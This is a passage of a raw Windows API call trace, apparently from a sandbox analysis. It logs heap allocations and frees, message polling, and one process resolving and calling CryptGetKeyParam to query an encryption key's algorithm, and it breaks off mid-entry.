RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0108.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0108.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0108.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x135eb) returned 0x4516010 [0108.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0108.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27d0 [0108.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0108.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0108.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0108.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a00 [0108.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0108.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0108.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0108.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29f0 [0108.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0108.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0108.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0108.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0108.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0108.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0108.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0108.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0108.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0108.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x135eb) returned 0x499a008 [0108.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0108.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0108.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0108.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0108.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0108.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0108.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0108.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0108.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0108.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0108.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0108.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0108.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0108.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0108.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0108.380] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0108.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0108.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0108.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0108.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0108.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0108.380] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0108.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0108.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0108.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0108.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0108.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0108.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0108.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0108.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0108.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0108.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0108.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0108.381] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0108.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0108.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0108.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0108.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29e0 [0108.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0108.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0108.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0108.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0108.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0108.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0108.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0108.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0108.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0108.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0108.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0108.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0108.382] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0108.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0108.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0108.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0108.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0108.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0108.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0108.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0108.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0108.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0108.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0108.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0108.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0108.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0108.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0108.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0108.382] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0108.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0108.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0108.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0108.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0108.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0108.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0108.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0108.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0108.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0108.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0108.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0108.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0108.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0108.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0108.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0108.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0108.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0108.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0108.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0108.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0108.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0108.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0108.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0108.383] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0108.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0108.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0108.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0108.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0108.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0108.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0108.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0108.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0108.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0108.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0108.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0108.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0108.383] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0108.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0108.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0108.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa78 [0108.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0108.384] PeekMessageW (in: lpMsg=0x144db3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144db3c) returned 0 [0108.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0108.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0108.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0108.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0108.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0108.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0108.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0108.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0108.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0108.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0108.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0108.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0108.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0108.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0108.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0108.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0108.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0108.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0108.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0108.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0108.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0108.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0108.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0108.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0108.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0108.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0108.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0108.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0108.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0108.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0108.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0108.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0108.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0108.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0108.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0108.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0108.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0108.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0108.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0108.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0108.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0108.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0108.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0108.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0108.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0108.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0108.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0108.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0108.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0108.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0108.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0108.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0108.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0108.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0108.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0108.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0108.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0108.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0108.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0108.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0108.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0108.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0108.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0108.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0108.386] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0108.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0108.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0108.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0108.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0108.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0108.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0108.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0108.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0108.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0108.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0108.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0108.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0108.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0108.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0108.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0108.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0108.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0108.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0108.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0108.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0108.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0108.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0108.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0108.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0108.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0108.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0108.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0108.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0108.387] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0108.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0108.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0108.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0108.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0108.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0108.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0108.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0108.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0108.387] CryptGetKeyParam (in: hKey=0x41ac140, dwParam=0x7, pbData=0x43e2960, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2960*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0108.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0108.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: 